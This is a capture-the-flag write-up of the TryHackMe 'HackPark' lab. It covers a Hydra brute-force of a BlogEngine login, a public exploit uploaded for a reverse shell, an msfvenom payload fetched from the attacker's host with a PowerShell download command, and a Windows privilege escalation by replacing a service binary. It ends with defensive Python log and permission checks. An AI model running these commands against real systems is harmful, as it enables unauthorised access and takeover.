thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an account's credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


#1 Deploy the machine and access its web server.
#2 What's the name of the clown displayed on the homepage?

 

[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing can mean trying every possible combination of a password. Dictionary attacks are also a type of brute-forcing, where we iterate through a wordlist to obtain the password.


#1 We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web forms make one of two types of request to a webserver: a GET request, which is used to request data from a webserver, and a POST request, which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using?

#2 Now that we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

Guess a username, choose a password wordlist and gain credentials to a user account!

#3 Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but also other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

Command: hydra -P <wordlist> -v <ip> <protocol>
Description: Brute force against a protocol of your choice.

Command: hydra -v -V -u -L <username list> -P <password list> -t 1 <ip> <protocol>
Description: You can use Hydra to brute-force usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts.)

Command: hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
Description: Attack a Windows Remote Desktop with a password list.

Command: hydra -l <username> -P <password list> $ip -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Description: Craft a more specific request for Hydra to brute force.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

E:\PENTEST\thc-hydra>hydra -l admin -P rock.txt 10.10.140.111 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-03 19:49:39
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:0), ~6 try per task
[DATA] attacking http-post-form://10.10.140.111:80/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.140.111   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-03 19:49:52

E:\PENTEST\thc-hydra>
Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information, open the Network tab in the developer tools, send one login request with random credentials and inspect it by clicking “Edit and Resend”.



The request body can be found in the “Request Body” section at the bottom. Before pasting it into the terminal we need to find where the credentials are used, so Hydra knows where to insert its guesses.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra.

One last piece of information Hydra needs is a message indicating failure, so it can tell when the guessed password is correct. On a failed login, the site shows “Login failed”. That’s exactly the string we need.

After running Hydra and obtaining the password, we can log into BlogEngine as admin 🔥


In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is a CVE (Common Vulnerabilities and Exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researchers. It is owned by Offensive Security (who are responsible for OSCP and Kali).


#1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
#2 Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE?

#3 Using the public exploit, gain initial access to the server.

Who is the webserver running as?


In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.


#1 Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2 You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.

What is the OS version of this Windows machine?

#3 Further enumerate the machine.

What is the name of the abnormal service running?

#4 What is the name of the binary you’re supposed to exploit?
#5 Using this abnormal service, escalate your privileges!

What is the user flag (on Jeff's Desktop)?

#6 What is the root flag?

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


#1 Now we can generate a more stable shell using msfvenom instead of using a meterpreter. This time let’s set our payload to windows/shell_reverse_tcp
#2 After generating our payload we need to pull this onto the box using PowerShell.

Tip: It’s common to find C:\Windows\Temp is world writable!
#3 Now you know how to pull files from your machine to the victim’s machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPEAS, what was the original install time of the server? (This is a date and time.) It can also be found from a cmd shell with: systeminfo

Writeup:

Try it for yourself here.

Deployment and reverse image search

After the machine had deployed, I opened the website and was greeted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the movie IT. I didn’t, so I used reverse image search to find out who he is. Google didn’t provide any good output, but TinEye did.


Compromise the machine

The first thing to do is to check the version of BlogEngine. It can be found in the “About” tab. A quick Google search of this version revealed this exploit in exploit-db.

Example search for an exploit with the “searchsploit” command on Kali Linux. We’ll use the fourth result.

Inside the exploit, a comment specified exactly what we needed to do to get this running. Firstly, change the attacker address and port to yours.

Rename the exploit to PostView.ascx. It should be uploaded via editing a post:

To upload the file, edit the only post on the website and click the folder icon marked above.

To get the reverse shell we only need to start a Netcat listener and navigate to http://10.10.147.54/?theme=../../App_Data/files

There is nothing prettier than getting a reverse shell

By running whoami we see that the server is running as “iis apppool\blog”.
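Seen from the server side, both the Hydra run against the login form and the PostView.ascx upload via the theme parameter leave traces in the IIS logs. The following Python is an added example (not code from the original post): it flags any client that hammers /Account/login.aspx and any request whose theme= value climbs out of the themes folder. The log lines are constructed, the #Fields header is a trimmed W3C field list, and the 60-second window and five-attempt threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed IIS W3C log (not from the page): five quick POSTs to the login
# form from one client, then a theme= request that climbs out of the themes folder.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2020-06-03 19:49:40 10.10.140.111 POST /Account/login.aspx ReturnURL=/admin 10.9.1.5 200
2020-06-03 19:49:41 10.10.140.111 POST /Account/login.aspx ReturnURL=/admin 10.9.1.5 200
2020-06-03 19:49:42 10.10.140.111 POST /Account/login.aspx ReturnURL=/admin 10.9.1.5 200
2020-06-03 19:49:43 10.10.140.111 POST /Account/login.aspx ReturnURL=/admin 10.9.1.5 200
2020-06-03 19:49:44 10.10.140.111 POST /Account/login.aspx ReturnURL=/admin 10.9.1.5 302
2020-06-03 20:01:03 10.10.140.111 GET / theme=..%2F..%2FApp_Data%2Ffiles 10.9.1.5 500
"""

def parse_iis(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def login_bursts(entries, path="/Account/login.aspx", window=60, threshold=5):
    """Clients with >= threshold POSTs to the login form inside `window` seconds."""
    times = defaultdict(list)
    for e in entries:
        if e["cs-method"] == "POST" and e["cs-uri-stem"].lower() == path.lower():
            times[e["c-ip"]].append(datetime.strptime(e["date"] + " " + e["time"], "%Y-%m-%d %H:%M:%S"))
    flagged = {}
    for ip, stamps in times.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window:
                start += 1          # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)   # report total POSTs from this client
                break
    return flagged

def theme_traversal(entries):
    """Return requests whose theme= parameter contains '..' once URL-decoded."""
    hits = []
    for e in entries:
        for param in unquote(e.get("cs-uri-query", "-")).split("&"):
            if param.lower().startswith("theme=") and ".." in param:
                hits.append(e)
    return hits
```

The query is decoded only once; double-encoded probes would need a second unquote before the check.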

Privilege Escalation [without Metasploit]

Before scanning the machine to find a way to escalate privileges, let’s get a stable shell. We will create a reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]

Now the payload is ready. Start a small web server with python3 -m http.server so the machine is able to download the executable.

We don’t have write permissions to the current folder, so before downloading, navigate to C:\Windows\Temp. To download, use this command (DownloadFile takes the source URL and the destination file name):

powershell "(New-Object System.Net.WebClient).DownloadFile('http://[your_ip]:[listening_port]/[shell_name.exe]', '[shell_name.exe]')"

Amazing. Now listen on the port you specified previously and run the executable.

A stable reverse shell

The same way we sent this reverse shell we can send an enumeration script. I used winPEAS.

Analyzing the results of the enumeration took a while. Under the “Running Processes” section there is a process named “Message.exe”. Further inspection shows that it keeps stopping and starting repeatedly. If we can replace Message.exe with our reverse shell executable, we can get a shell with higher privileges.

Message.exe can be found under C:\Program Files (x86)\SystemScheduler. Rename Message.exe to Message.bak, send your shell and rename it to Message.exe. Don’t forget to listen on the port you specified!

Wait a little, and voilà! We have a shell. Running whoami returns:

These permissions are enough to access both “jeff” and “Administrator”, which hold the user and root flags.
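The weakness used here is a service binary that lives in a folder ordinary users can write to. As an added example that is not part of the original post, the following Python audit parses saved icacls output for service folders and reports any where a low-privileged principal holds a right that lets files be replaced. The icacls text is constructed, and the low-privilege principal set and the write-capable rights set are assumptions to adjust per environment.

```python
import re

# Constructed icacls output (not from the page): the folder holding the
# scheduler's Message.exe, with an ACE granting ordinary users full control.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\SystemScheduler BUILTIN\Users:(OI)(CI)(F)
                                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Program Files (x86)\GoodService NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                   BUILTIN\Administrators:(I)(OI)(CI)(F)
                                   BUILTIN\Users:(I)(OI)(CI)(RX)
"""

# Principals every ordinary user falls under (assumed list; extend per domain).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow creating, deleting or replacing files in the folder,
# or rewriting its ACL/owner: simple F/M/W plus the relevant specific rights.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "D", "WDAC", "WO"}

ACE_RE = re.compile(
    r"^(?P<path>.*?)\s+"
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|[^\s:()\\]+)\\[^:()\\]+|Everyone|CREATOR OWNER)"
    r":(?P<perms>(?:\([^)]*\))+)\s*$")

def parse_icacls(text):
    """Return [(path, principal, {rights})]; indented lines inherit the path."""
    aces, current = [], None
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if not m:          # summary lines such as "Successfully processed ..."
            continue
        if m.group("path"):
            current = m.group("path")
        groups = re.findall(r"\(([^)]*)\)", m.group("perms"))
        rights = {r for g in groups for r in g.split(",")}
        aces.append((current, m.group("principal"), rights))
    return aces

def weak_binary_dirs(text):
    """Folders where a low-privileged principal can replace files, which is
    exactly what swapping Message.exe for another binary relies on."""
    weak = {}
    for path, principal, rights in parse_icacls(text):
        if principal.lower() in LOW_PRIV and rights & WRITE_RIGHTS:
            weak.setdefault(path, []).append(principal)
    return weak
```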

Author: Jacco Straathof
